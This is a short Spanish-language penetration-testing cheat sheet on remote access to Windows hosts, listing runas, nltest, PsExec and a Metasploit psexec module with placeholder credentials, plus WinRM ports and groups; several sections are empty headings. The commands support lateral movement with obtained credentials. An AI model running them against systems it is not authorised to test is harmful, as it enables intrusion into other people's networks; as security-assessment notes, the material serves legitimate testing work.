Conexión remota

Windows

Runas

runas /user:xtormincorp\usuario powershell.exe

Para comprobar el acceso con el usuario no servirá whoami, en vez de ello sería mejor usar:

nltest /dsgetdc:xtormincorp.local

PSExec

Puerto

445/tcp (SMB)

Grupo requerido

Administradores

Herramienta de Sysinternals:

https://learn.microsoft.com/es-es/sysinternals/downloads/psexecarrow-up-right

psexec64.exe \\MACHINE_IP -u Administrator -p <password> -i cmd.exe

Metasploit:

use exploit/windows/smb/psexec
set RHOSTS file:/home/kali/scope.txt
set smbuser xtormin
set smbpass password123
exploit
psexec -i -s powershell.exe # Ejecución de consola interactiva con el usuario actual

WinRM

Puerto

5985/tcp (WinRM HTTP)

5986/tcp (WinRM HTTPS)

Grupo requerido

Remote Management Users

CMD:

PowerShell:

Primero se debe crear un objeto PSCredential con las credenciales del usuario:

  • Crear sesión activa:

  • Ejecutar ScriptBlocks vía WinRM:

Netexec

Linux

Última actualización